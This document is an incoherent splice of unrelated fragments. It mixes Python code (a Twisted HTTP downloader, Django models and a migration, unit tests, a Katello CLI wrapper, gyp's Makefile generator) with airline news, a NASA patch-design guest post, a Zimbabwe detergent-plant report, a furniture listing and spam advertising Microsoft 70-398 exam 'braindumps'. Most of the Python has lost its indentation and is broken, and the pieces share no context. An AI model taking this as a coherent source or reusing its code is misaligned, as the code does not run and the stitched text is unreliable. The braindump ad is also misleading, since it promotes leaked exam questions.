return Sentinel1(*args, **kwargs).run(*args, **kwargs)
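# --- Usage sketch (illustrative; the paths below are made up) ----------------
# Within a pyrat session, the convenience wrappers above import a product:
#
#   envisat(file="/data/scene.N1")
#   palsar(dir="/data/PALSAR_product")
#   radarsat2(dir="/data/RS2_product")
#   sentinel1(dir="/data/S1_product.SAFE")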
Piyasvasti Amranand, president of Thai Airways International, tells ABTN about the airline's plans for growth, new products and new aircraft.
Thai Airways has agreed terms to lease eight Boeing 777-300ER twin jets.
Thai Airways and Singapore airline Tiger Airways are set to form a new low cost carrier.
Starting June 1, premium fare passengers booking Thai Airways between Bangkok, Paris CDG and Tokyo Narita will be sampling some of the world's best seating such as suites in first class and fully flat beds in business class.
from twisted.web import client
from twisted.internet import reactor, defer, ssl
from urlparse import urlparse
class HTTPProgressDownloader(client.HTTPDownloader):
def __init__(self, url, outfile, headers = None):
client.HTTPDownloader.__init__(self, url, outfile, headers=headers, agent='STB HTTP Downloader')
self.status = None
self.progress_callback = None
self.deferred = defer.Deferred()
def noPage(self, reason):
if self.status == '304':
print reason.getErrorMessage()
client.HTTPDownloader.page(self, '')
else:
client.HTTPDownloader.noPage(self, reason)
def gotHeaders(self, headers):
if self.status == '200':
            if 'content-length' in headers:
self.totalbytes = int(headers['content-length'][0])
else:
self.totalbytes = 0
self.currentbytes = 0.0
return client.HTTPDownloader.gotHeaders(self, headers)
def pagePart(self, packet):
if self.status == '200':
self.currentbytes += len(packet)
if self.totalbytes and self.progress_callback:
self.progress_callback(self.currentbytes, self.totalbytes)
return client.HTTPDownloader.pagePart(self, packet)
def pageEnd(self):
return client.HTTPDownloader.pageEnd(self)
class downloadWithProgress:
def __init__(self, url, outputfile, contextFactory = None, *args, **kwargs):
parsed = urlparse(url)
scheme = parsed.scheme
host = parsed.hostname
port = parsed.port or (443 if scheme == 'https' else 80)
self.factory = HTTPProgressDownloader(url, outputfile, *args, **kwargs)
        if scheme == 'https':
            # ssl is already imported at module level
            if contextFactory is None:
                contextFactory = ssl.ClientContextFactory()
self.connection = reactor.connectSSL(host, port, self.factory, contextFactory)
else:
self.connection = reactor.connectTCP(host, port, self.factory)
def start(self):
return self.factory.deferred
def stop(self):
print '[stop]'
self.connection.disconnect()
def addProgress(self, progress_callback):
print '[addProgress]'
self.factory.progress_callback = progress_callback
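# --- Usage sketch (illustrative; URL, path and callback are made up) ---------
#
#   def report(current, total):
#       print '%d / %d bytes' % (current, total)
#
#   downloader = downloadWithProgress('http://example.com/file.bin',
#                                     '/tmp/file.bin')
#   downloader.addProgress(report)
#   downloader.start().addBoth(lambda _: reactor.stop())
#   reactor.run()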
Commits any pending changes. This method should only be called once. Once called, property values should not be changed.
Optionally, the block invoked when the user profile change has been applied. It is invoked asynchronously on the main thread in the future.
from django.db import models
class Timetable(models.Model):
DW_MON = 0
DW_TUE = 1
DW_WED = 2
DW_THU = 3
DW_FRI = 4
DAY_OF_WEEK_CHOICES = (
(DW_MON, 'Monday'),
(DW_TUE, 'Tuesday'),
(DW_WED, 'Wednesday'),
(DW_THU, 'Thursday'),
(DW_FRI, 'Friday'),
)
day_of_week = models.IntegerField(choices=DAY_OF_WEEK_CHOICES, null=False, blank=False)
start_time = models.TimeField(null=False, blank=False)
end_time = models.TimeField(null=False, blank=False)
break_start_time = models.TimeField(null=False, blank=False)
break_end_time = models.TimeField(null=False, blank=False)
doctor = models.ForeignKey('clinic.Doctor', on_delete=models.CASCADE)
    def __str__(self):
        # get_day_of_week_display() is Django's built-in accessor for fields
        # with choices; it replaces the manual dict lookup.
        return 'Timetable for "%s" %s %s-%s (%s-%s)' % (
            str(self.doctor),
            self.get_day_of_week_display(),
            self.start_time,
            self.end_time,
            self.break_start_time,
            self.break_end_time,
        )
class Meta:
unique_together = [
['doctor', 'day_of_week'],
]
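# --- Usage sketch (illustrative; assumes a saved clinic.Doctor instance) -----
#
#   from datetime import time
#   Timetable.objects.create(
#       doctor=doctor,
#       day_of_week=Timetable.DW_MON,
#       start_time=time(9, 0),
#       end_time=time(17, 0),
#       break_start_time=time(13, 0),
#       break_end_time=time(14, 0),
#   )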
Home » Guest Post: What’s Behind Patch Design?
Guest Post: What’s Behind Patch Design?
As long as there have been reasons to mark accomplishments and alliances, there have been emblems to commemorate those milestones. From the US Army to the Girl Scouts and Boy Scouts, all the way up to the astronauts corps, patches have been a way to indicate individual and team achievements.
Patches and insignia do not appear in a vacuum. Careful design work, often between many people, goes into each patch. A patch has to communicate to an observer and also should have some meaningful connection to the wearer that instills pride and honor.
Like all artwork, from sculptures and architecture to paintings, the genesis is a simple idea. The designer may have a general notion, working closely with other people involved to round out the message.
For example, an astronaut “crew patch” will express some of the ideals or goals of the crew for that mission. If it is a mission to bring a new component to the International Space Station, it should somehow illustrate that, so that when someone in the future looks at the insignia, they immediately understand the crew's primary mission.
Other key parts of good patch design include symbols of the mission or crew. They may be cultural or ethnic in origin, or indicate patriotism when specific details of a national security mission are shrouded in secrecy. Symbols may pay homage to those the crew wish to memorialize or express gratitude for. Most patch designs will mix these elements. It is up to the designer to work closely with the crew to establish what concepts and messaging they want to include in the design and how they may want to express them.
When I say “designer” keep in mind I am not specifically referring to a professional graphic designer. Design comes from many places and in many forms. Some patch designs start out as a general idea that may originate from a family member or close friend. There are cases where a contest is held and a winning design is selected, often from people in a specific region. Of course, many designs do originate from professional graphic designers who work with the crew or organization. The organization may have a specific, established aesthetic. For example, SpaceX and Orbital Sciences have an in-house designer for all their patches so they have a consistent branding represented.
I have talked about crew patches, but there are also patches that mark significant milestones or commemorate specific events. For example, there is a patch that every shuttle astronaut earns after their first space shuttle flight called the “Mach 25” patch. You will see this worn proudly on every blue NASA jumpsuit worn by a veteran shuttle astronaut. The only way you can earn the “Mach 25” patch is to experience a flight on the Space Shuttle, because they are the only vehicles capable of flight at 25 times the speed of sound! Other patches may mark an individual astronaut’s flight into space; these are referred to as “personal patches” and they usually contain design elements of their specific mission objectives for their flight or stay on the ISS.
Not all patches are intended to commemorate specific individuals. Patches have been designed for agencies, payloads, unmanned probes, and even experiments that never leave Earth. However, they are just as meaningful and sentimental to the people involved. Many different organizations and thousands of individuals may contribute to a specific launch so it is not uncommon for a single mission to result in five or ten different patches awarded to different teams and contractors! A Spacelab module mission on the Space Shuttle can yield dozens of patches, one for each of the multitude of experiments on board. However, even small, terrestrial experiments have insignia for their teams or individuals as a way for them to commemorate their participation and be recognized for their efforts.
I have had the opportunity to design several official patches for NASA. I am not a graphic designer by trade; in fact, far from it, being a software engineer as my day job. My interest in design stems from my own personal interest in collecting many types of NASA patches. I have slowly accumulated a familiarity with and appreciation for what elements go into patch designs.
A number of years ago I seized a unique opportunity to design a patch for the former Star Trek actress Nichelle Nichols, who was to fly on board NASA’s SOFIA airborne observatory. The final look of this patch was somewhat unique in that the design was fully my own creation, but she loved it as-is and carried the patches on board the flight!
From that opportunity sprouted many more chances to design official patches for NASA! Those patches would all be collaborative efforts with the teams involved so their specific messaging, milestones, and objectives would be conveyed in the artwork. I am fortunate to have been granted extensive liberty with these designs, so I have been able to explore different approaches in my own style of expressing their ideas. I feel particular pride in being able to contribute to an agency and to people that have been a source of personal interest and excitement for me my entire life. It has been a greatly rewarding experience and I cannot describe how it feels to see my artwork in the wild!
I was ecstatic to be asked to be a part of the iLEAD panel to review patches designed by students. I was amazed by both the execution and design aesthetic of the participants and had a difficult time selecting the final picks. I look forward to seeing designs from these bright minds in the future.
About the author: Liem Bahneman is a lifelong space enthusiast. His interests range from astronomy and high-altitude ballooning to spaceflight and everything in between. While he is a software engineer by trade, he has found great joy in collecting NASA and spaceflight-related patches. More recently, he has cultivated an exciting creative outlet in designing embroidered patches, for other collectors, for NASA missions that lacked their own official insignia. This would eventually lead to real opportunities to design official project and mission insignia for NASA and the Boeing Company. He hopes to someday design a mission emblem for an official interplanetary probe or manned mission to space.
I really appreciate your post; this will really provide great information. Thanks for sharing.
import unittest
class MathopTest(unittest.TestCase):
CLASS = None
def setUp(self):
if self.CLASS is None:
raise unittest.SkipTest("Base class not tested")
def test_should_chain_computation(self):
self.assertEqual(repr(self.CLASS(5)),
"<MathOp 5>")
self.assertEqual(repr(self.CLASS(5).mul(2)),
"<MathOp 10>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17)),
"<MathOp 27>")
self.assertEqual(repr(self.CLASS(5).mul(2).add(17).sub(4)),
"<MathOp 23>")
self.assertEqual(repr(self.CLASS(5).mul(2).div(2)),
"<MathOp 5>")
def test_should_chain_nan(self):
self.assertEqual(repr(self.CLASS(5).div(0)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17)),
"<MathOp NaN>")
self.assertEqual(repr(self.CLASS(5).div(0).mul(2).add(17).sub(4)),
"<MathOp NaN>")
from monads.mathop import step1, step2_1, step2_2, step3, step4
class TestStep1(MathopTest):
CLASS = step1.MathOp
class TestStep2_1(MathopTest):
CLASS = step2_1.MathOp
class TestStep2_2(MathopTest):
CLASS = step2_2.MathOp
class TestStep3(MathopTest):
CLASS = step3.MathOp
class TestStep4(MathopTest):
CLASS = step4.MathOp
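# --- Illustrative MathOp (not one of the step modules imported above) --------
# A minimal implementation consistent with these tests: operations chain, and
# a division by zero poisons the rest of the chain with NaN, Maybe-style.
#
#   class MathOp(object):
#       def __init__(self, value):
#           self.value = value
#       def _bind(self, func):
#           return self if self.value is None else MathOp(func(self.value))
#       def add(self, n):
#           return self._bind(lambda v: v + n)
#       def sub(self, n):
#           return self._bind(lambda v: v - n)
#       def mul(self, n):
#           return self._bind(lambda v: v * n)
#       def div(self, n):
#           if n == 0:
#               return MathOp(None)
#           return self._bind(lambda v: v // n)
#       def __repr__(self):
#           return "<MathOp %s>" % ("NaN" if self.value is None else self.value)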
"The smaller detergent paste plant will be commissioned in February 2018, following significant delays experienced in clearing critical spares and equipment from South Africa," Sayed Mahmed, the company's managing director said.
Trade Kings Zimbabwe's plants will generate much needed foreign currency for the country while local production will also reduce the country's current reliance on imported detergent products. Construction of the plant as well as installations were done through local contractors under the supervision of Desmet Ballestra S.p.A, global leaders in spray drying and detergent technology.
"At full capacity the plants will employ between 400 and 500 people, the majority of which will be involved in production and develop skills associated with state of the art technology and machinery," he said.
The investment into local detergent manufacturing is in consonance with Government's blueprint under Zim-Asset, and in September 2015 the project was granted National Project Status.
# -*- encoding: utf-8 -*-
"""
Usage::
hammer activation-key [OPTIONS] SUBCOMMAND [ARG] ...
Parameters::
SUBCOMMAND subcommand
[ARG] ... subcommand arguments
Subcommands::
add-host-collection Associate a resource
add-subscription Add subscription
content-override Override product content defaults
copy Copy an activation key
create Create an activation key
delete Destroy an activation key
host-collections List associated host collections
info Show an activation key
list List activation keys
product-content List associated products
remove-host-collection Disassociate a resource
remove-subscription Remove subscription
subscriptions List associated subscriptions
update Update an activation key
"""
from robottelo.cli.base import Base
class ActivationKey(Base):
"""Manipulates Katello's activation-key."""
command_base = 'activation-key'
@classmethod
def add_host_collection(cls, options=None):
"""Associate a resource"""
cls.command_sub = 'add-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def add_subscription(cls, options=None):
"""Add subscription"""
cls.command_sub = 'add-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def content_override(cls, options=None):
"""Override product content defaults"""
cls.command_sub = 'content-override'
return cls.execute(cls._construct_command(options))
@classmethod
def copy(cls, options=None):
"""Copy an activation key"""
cls.command_sub = 'copy'
return cls.execute(cls._construct_command(options))
@classmethod
def host_collection(cls, options=None):
"""List associated host collections"""
cls.command_sub = 'host-collections'
return cls.execute(cls._construct_command(options))
@classmethod
def product_content(cls, options=None):
"""List associated products"""
cls.command_sub = 'product-content'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_host_collection(cls, options=None):
"""Remove the associated resource"""
cls.command_sub = 'remove-host-collection'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_repository(cls, options=None):
"""Disassociate a resource"""
cls.command_sub = 'remove-repository'
return cls.execute(cls._construct_command(options))
@classmethod
def remove_subscription(cls, options=None):
"""Remove subscription"""
cls.command_sub = 'remove-subscription'
return cls.execute(cls._construct_command(options))
@classmethod
def subscriptions(cls, options=None):
"""List associated subscriptions"""
cls.command_sub = 'subscriptions'
return cls.execute(cls._construct_command(options))
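# --- Usage sketch (illustrative; the IDs and names below are made up) --------
#
#   ActivationKey.copy({'id': 42, 'new-name': 'ak-copy'})
#   ActivationKey.add_host_collection({'id': 42, 'host-collection-id': 7})
#   ActivationKey.subscriptions({'id': 42, 'organization-id': 1})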
We are proud of our efforts, and we provide valid 70-398 dumps with a 100% passing guarantee.
We also provide a 100% money back guarantee on 70-398 braindumps if they fail to deliver the promised results.
We also provide a user-friendly interface for 70-398 practice test software so the end users can use the software without any hassle.
Our 70-398 exam dumps is frequently updated, and we provide free 3 months updates for 70-398 products from the date of purchase.
Our 70-398 exam products are examined by a large number of customers who previously passed various tests by utilizing our exam simulators. Check customer feedback to see what they say about us.
We at DumpsBuzz provide frequent updates for our Microsoft Planning for and Managing Devices in the Enterprise exam. We update 70-398 exam questions as soon as we sense a change. Moreover, you will be able to get free new 70-398 questions as we provide updates for 3 months from the date of purchase. You can get multiple benefits by selecting our 70-398 exam prep including the real practice exam questions in PDF & Testing engine format.
Our 70-398 practice test software contains multiple learning tools that will help you pass the Microsoft Planning for and Managing Devices in the Enterprise test in the first attempt. We also provide actual 70-398 questions as PDF dumps for quick practice. Our 70-398 vce products are easy to use, and you can simply turn things around by going through all the Planning for and Managing Devices in the Enterprise exam material to ensure your success in the exam. Our 70-398 PDF dumps will help you prepare for the Microsoft Planning for and Managing Devices in the Enterprise exam even when you are at work.
Do you need to find a high paying job for yourself? Well, by passing the Microsoft Planning for and Managing Devices in the Enterprise exam, you will be able to get your dream job. Make sure that you are buying our bundle 70-398 braindumps pack so you can check out all the products that will help you come up with a better solution. You can easily land a dream job by passing the 70-398 exam in the first attempt.
With our 70-398 practice test software, you can simply assess yourself by going through the 70-398 practice tests. We highly recommend going through the Microsoft 70-398 answers multiple times so you can assess your preparation for the actual Planning for and Managing Devices in the Enterprise exam. Make sure that you are preparing yourself for the Microsoft 70-398 test with our practice test software as it will help you get a clear idea of the real 70-398 exam scenario. By passing the exams multiple times on practice test software, you will be able to pass the real 70-398 test in the first attempt.
If you are facing multiple problems during the preparation of Microsoft Planning for and Managing Devices in the Enterprise exam, then you can always consult with our Microsoft certified experts to find the right tips to pass the 70-398 exam in the first attempt. We provide top notch support to back all of our promises to you. Get in touch with us to get the help you need.
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0015_newsletterexternalarticlelink2'),
]
operations = [
migrations.AlterField(
model_name='newsletterarticlelink',
name='article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wagtailcore.Page', help_text='Link to an internal article', null=True),
),
migrations.AlterField(
model_name='newslettereventlink',
name='event',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='events.EventPage', help_text='Link to an event', null=True),
),
migrations.AlterField(
model_name='newsletterexternalarticlelink',
name='external_article',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, blank=True, to='articles.ExternalArticlePage', help_text='Link to an external article', null=True),
),
]
For your consideration: a vanity mirror constructed with Carrera marble and stainless steel. Double sided. Unmarked.
Made in Italy circa 1960s.
import hashlib
import os
import re
import gyp
from gyp import xcode_emulation
from gyp.common import GypError, EnsureDirExists
from gyp.generator.make import generator_default_variables,CalculateVariables
# The .d checking code below uses these functions:
# wildcard, sort, foreach, shell, wordlist
# wildcard can handle spaces, the rest can't.
# Since I could find no way to make foreach work with spaces in filenames
# correctly, the .d files have spaces replaced with another character. The .d
# file for
# Chromium\ Framework.framework/foo
# is for example
# out/Release/.deps/out/Release/Chromium?Framework.framework/foo
# This is the replacement character.
SPACE_REPLACEMENT = '?'
# Header of toplevel Makefile.
# This should go into the build tree, but it's easier to keep it here for now.
_dirname = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(_dirname, 'Makefile.tmpl'), 'rt') as f:
file_content = f.read()
SHARED_HEADER = file_content.format(SPACE_REPLACEMENT=SPACE_REPLACEMENT)
SHARED_HEADER_SUFFIX_RULES_COMMENT1 = ("""\
# Suffix rules, putting all outputs into $(obj).
""")
SHARED_HEADER_SUFFIX_RULES_COMMENT2 = ("""\
# Try building from generated source, too.
""")
header = """\
# This file is generated by gyp; do not edit.
"""
# Maps every compilable file extension to the do_cmd that compiles it.
COMPILABLE_EXTENSIONS = {
'.c': 'cc',
'.cc': 'cxx',
'.cpp': 'cxx',
'.cxx': 'cxx',
'.s': 'cc',
'.S': 'cc',
'.m': 'objc',
'.mm': 'objcxx',
}
def WriteRootHeaderSuffixRules(writer):
extensions = sorted(COMPILABLE_EXTENSIONS.keys(), key=str.lower)
writer.write('# Suffix rules, putting all outputs into $(obj).\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n# Try building from generated source, too.\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
for ext in extensions:
writer.write('$(obj).$(TOOLSET)/%%.o: $(obj)/%%%s FORCE_DO_CMD\n' % ext)
writer.write('\t@$(call do_cmd,%s,1)\n' % COMPILABLE_EXTENSIONS[ext])
writer.write('\n')
def Compilable(filename):
"""Return true if the file is compilable (should be in OBJS)."""
for res in (filename.endswith(e) for e in COMPILABLE_EXTENSIONS):
if res:
return True
return False
# Map from qualified target to path to output.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
def Linkable(filename):
"""Return true if the file is linkable (should be on the link line)."""
return filename.endswith('.o')
def Target(filename):
"""Translate a compilable filename to its .o target."""
return os.path.splitext(filename)[0] + '.o'
def EscapeShellArgument(s):
"""
Quotes an argument so that it will be interpreted literally by a POSIX shell.
Taken from http://stackoverflow.com/questions/35817/whats-the-best-way-to-escape-ossystem-calls-in-python
"""
return "'" + s.replace("'", "'\\''") + "'"
def EscapeMakeVariableExpansion(s):
"""Make has its own variable expansion syntax using $. We must escape it for string to be interpreted literally."""
return s.replace('$', '$$')
def EscapeCppDefine(s):
"""Escapes a CPP define so that it will reach the compiler unaltered."""
s = EscapeShellArgument(s)
s = EscapeMakeVariableExpansion(s)
# '#' characters must be escaped even embedded in a string, else Make will
# treat it as the start of a comment.
return s.replace('#', r'\#')
def QuoteIfNecessary(string):
"""TODO: Should this ideally be replaced with one or more of the above functions?"""
if '"' in string:
string = '"' + string.replace('"', '\\"') + '"'
return string
def StringToMakefileVariable(string):
"""Convert a string to a value that is acceptable as a make variable name."""
return re.sub('[^a-zA-Z0-9_]', '_', string)
def Sourceify(path):
"""Convert a path to its source directory form."""
if '$(' in path:
return path
if os.path.isabs(path):
return path
return Sourceify.srcdir_prefix + path
Sourceify.srcdir_prefix = ''
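# The top-level generator is expected to overwrite srcdir_prefix (typically
# with '$(srcdir)/') once the relative source directory is known; the default
# of '' leaves paths untouched.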
def QuoteSpaces(s, quote=r'\ '):
return s.replace(' ', quote)
# TODO: Avoid code duplication with _ValidateSourcesForMSVSProject in msvs.py.
def _ValidateSourcesForOSX(spec, all_sources):
"""
  Makes sure duplicate basenames are not specified in the source list.
  Arguments:
    spec: The target dictionary containing the properties of the target.
    all_sources: A list of all source files for the target.
"""
if spec.get('type', None) != 'static_library':
return
basenames = {}
for source in all_sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in ['.c', '.cc', '.cpp', '.cxx', '.m', '.mm', '.s', '.S']
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ''
for basename, files in basenames.items():
if len(files) > 1:
error += ' %s: %s\n' % (basename, ' '.join(files))
if error:
    print('static library %s has several files with the same basename:\n%s'
          'libtool on OS X will generate warnings for them.' % (spec['target_name'], error))
raise GypError('Duplicate basenames in sources section, see list above')
# noinspection PyAttributeOutsideInit
class MakefileWriter(object):
"""MakefileWriter packages up the writing of one target-specific foobar.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, generator_flags, flavor):
self.generator_flags = generator_flags
self.flavor = flavor
self.suffix_rules_srcdir = {}
self.suffix_rules_objdir1 = {}
self.suffix_rules_objdir2 = {}
# Generate suffix rules for all compilable extensions.
for ext in COMPILABLE_EXTENSIONS.keys():
# Suffix rules for source folder.
self.suffix_rules_srcdir.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(srcdir)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
# Suffix rules for generated source files.
self.suffix_rules_objdir1.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj).$(TOOLSET)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
self.suffix_rules_objdir2.update({
ext: ("""\
$(obj).$(TOOLSET)/$(TARGET)/%%.o: $(obj)/%%%s FORCE_DO_CMD
@$(call do_cmd,%s,1)
""" % (ext, COMPILABLE_EXTENSIONS[ext]))
})
def Write(self, qualified_target, base_path, output_filename, spec, configs, part_of_all):
"""
The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
base_path: path relative to source root we're building in, used to resolve target-relative paths
output_filename: output .mk file name to write
spec: gyp info
configs: gyp info
part_of_all: flag indicating this target is part of 'all'
"""
EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
self.is_mac_bundle = xcode_emulation.IsMacBundle(self.flavor, spec)
if self.flavor == 'mac':
self.xcode_settings = xcode_emulation.XcodeSettings(spec)
else:
self.xcode_settings = None
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
extra_link_deps = []
extra_mac_bundle_resources = []
mac_bundle_deps = []
if self.is_mac_bundle:
self.output = self.ComputeMacBundleOutput()
self.output_binary = self.ComputeMacBundleBinaryOutput()
else:
self.output = self.output_binary = self.ComputeOutput(spec)
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
self._INSTALLABLE_TARGETS = ('executable', 'loadable_module', 'shared_library')
if (self.is_standalone_static_library or
self.type in self._INSTALLABLE_TARGETS):
self.alias = os.path.basename(self.output)
install_path = self._InstallableTargetInstallPath()
else:
self.alias = self.output
install_path = self.output
self.WriteLn("TOOLSET := " + self.toolset)
self.WriteLn("TARGET := " + self.target)
# Actions must come first, since they can generate more OBJs for use below.
if 'actions' in spec:
self.WriteActions(spec['actions'], extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all)
# Rules must be early like actions.
if 'rules' in spec:
self.WriteRules(spec['rules'], extra_sources, extra_outputs, extra_mac_bundle_resources)
if 'copies' in spec:
self.WriteCopies(spec['copies'], extra_outputs, part_of_all)
# Bundle resources.
if self.is_mac_bundle:
all_mac_bundle_resources = spec.get('mac_bundle_resources', []) + extra_mac_bundle_resources
self.WriteMacBundleResources(all_mac_bundle_resources, mac_bundle_deps)
self.WriteMacInfoPlist(mac_bundle_deps)
# Sources.
all_sources = spec.get('sources', []) + extra_sources
if all_sources:
if self.flavor == 'mac':
# libtool on OS X generates warnings for duplicate basenames in the same
# target.
_ValidateSourcesForOSX(spec, all_sources)
self.WriteSources(
configs, deps, all_sources, extra_outputs, extra_link_deps,
gyp.xcode_emulation.MacPrefixHeader(self.xcode_settings, lambda p: Sourceify(self.Absolutify(p)), self.Pchify)
)
sources = [x for x in all_sources if Compilable(x)]
if sources:
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT1)
extensions = set([os.path.splitext(s)[1] for s in sources])
for ext in extensions:
if ext in self.suffix_rules_srcdir:
self.WriteLn(self.suffix_rules_srcdir[ext])
self.WriteLn(SHARED_HEADER_SUFFIX_RULES_COMMENT2)
for ext in extensions:
if ext in self.suffix_rules_objdir1:
self.WriteLn(self.suffix_rules_objdir1[ext])
for ext in extensions:
if ext in self.suffix_rules_objdir2:
self.WriteLn(self.suffix_rules_objdir2[ext])
self.WriteLn('# End of this set of suffix rules')
# Add dependency from bundle to bundle binary.
if self.is_mac_bundle:
mac_bundle_deps.append(self.output_binary)
self.WriteTarget(spec, configs, deps, extra_link_deps + link_deps,
mac_bundle_deps, extra_outputs, part_of_all)
# Update global list of target outputs, used in dependency tracking.
target_outputs[qualified_target] = install_path
# Update global list of link dependencies.
if self.type in ('static_library', 'shared_library'):
target_link_deps[qualified_target] = self.output_binary
# Currently any versions have the same effect, but in future the behavior
# could be different.
if self.generator_flags.get('android_ndk_version', None):
self.WriteAndroidNdkModuleRule(self.target, all_sources, link_deps)
self.fp.close()
def WriteSubMake(self, output_filename, makefile_path, targets, build_dir):
"""Write a "sub-project" Makefile.
This is a small, wrapper Makefile that calls the top-level Makefile to build
the targets from a single gyp file (i.e. a sub-project).
Arguments:
output_filename: sub-project Makefile name to write
makefile_path: path to the top-level Makefile
targets: list of "all" targets for this sub-project
build_dir: build output directory, relative to the sub-project
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
# For consistency with other builders, put sub-project build output in the
# sub-project dir (see test/subdirectory/gyptest-subdir-all.py).
self.WriteLn('export builddir_name ?= %s' %
os.path.join(os.path.dirname(output_filename), build_dir))
self.WriteLn('.PHONY: all')
self.WriteLn('all:')
if makefile_path:
makefile_path = ' -C ' + makefile_path
self.WriteLn('\t$(MAKE)%s %s' % (makefile_path, ' '.join(targets)))
self.fp.close()
def WriteActions(self, actions, extra_sources, extra_outputs,
extra_mac_bundle_resources, part_of_all):
"""Write Makefile code for any 'actions' from the gyp input.
extra_sources: a list that will be filled in with newly generated source
files, if any
extra_outputs: a list that will be filled in with any outputs of these
actions (used to make other pieces dependent on these
actions)
part_of_all: flag indicating this target is part of 'all'
"""
env = self.GetSortedXcodeEnv()
for action in actions:
name = StringToMakefileVariable('%s_%s' % (self.qualified_target,
action['action_name']))
self.WriteLn('### Rules for action "%s":' % action['action_name'])
inputs = action['inputs']
outputs = action['outputs']
# Build up a list of outputs.
# Collect the output dirs we'll need.
dirs = set()
for out in outputs:
d = os.path.split(out)[0]
if d:
dirs.add(d)
if int(action.get('process_outputs_as_sources', False)):
extra_sources += outputs
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Write the actual command.
action_commands = action['action']
if self.flavor == 'mac':
action_commands = [gyp.xcode_emulation.ExpandEnvVars(command, env) for command in action_commands]
command = gyp.common.EncodePOSIXShellList(action_commands)
if 'message' in action:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, action['message']))
else:
self.WriteLn('quiet_cmd_%s = ACTION %s $@' % (name, name))
if len(dirs) > 0:
command = 'mkdir -p %s' % ' '.join(dirs) + '; ' + command
cd_action = 'cd %s; ' % Sourceify(self.path or '.')
# command and cd_action get written to a toplevel variable called
# cmd_foo. Toplevel variables can't handle things that change per
# makefile like $(TARGET), so hardcode the target.
command = command.replace('$(TARGET)', self.target)
cd_action = cd_action.replace('$(TARGET)', self.target)
# Set LD_LIBRARY_PATH in case the action runs an executable from this
# build which links to shared libs from this build.
# actions run on the host, so they should in theory only use host
# libraries, but until everything is made cross-compile safe, also use
# target libraries.
# TODO(piman): when everything is cross-compile safe, remove lib.target
self.WriteLn('cmd_%s = LD_LIBRARY_PATH=$(builddir)/lib.host:'
'$(builddir)/lib.target:$$LD_LIBRARY_PATH; '
'export LD_LIBRARY_PATH; '
'%s%s'
% (name, cd_action, command))
self.WriteLn()
outputs = [self.Absolutify(o) for o in outputs]
# The makefile rules are all relative to the top dir, but the gyp actions
# are defined relative to their containing dir. This replaces the obj
# variable for the action rule with an absolute version so that the output
# goes in the right place.
# Only write the 'obj' and 'builddir' rules for the "primary" output (:1);
# it's superfluous for the "extra outputs", and this avoids accidentally
# writing duplicate dummy rules for those outputs.
# Same for environment.
self.WriteLn("%s: obj := $(abs_obj)" % QuoteSpaces(outputs[0]))
self.WriteLn("%s: builddir := $(abs_builddir)" % QuoteSpaces(outputs[0]))
self.WriteSortedXcodeEnv(outputs[0], self.GetSortedXcodeEnv())
for i in inputs:
assert ' ' not in i, ("Spaces in action input filenames not supported (%s)" % i)
for output in outputs:
assert ' ' not in output, ("Spaces in action output filenames not supported (%s)" % output)
# See the comment in WriteCopies about expanding env vars.
outputs = [gyp.xcode_emulation.ExpandEnvVars(o, env) for o in outputs]
inputs = [gyp.xcode_emulation.ExpandEnvVars(i, env) for i in inputs]
self.WriteDoCmd(outputs, map(Sourceify, map(self.Absolutify, inputs)), part_of_all=part_of_all, command=name)
# Stuff the outputs in a variable so we can refer to them later.
outputs_variable = 'action_%s_outputs' % name
self.WriteLn('%s := %s' % (outputs_variable, ' '.join(outputs)))
extra_outputs.append('$(%s)' % outputs_variable)
self.WriteLn()
self.WriteLn()
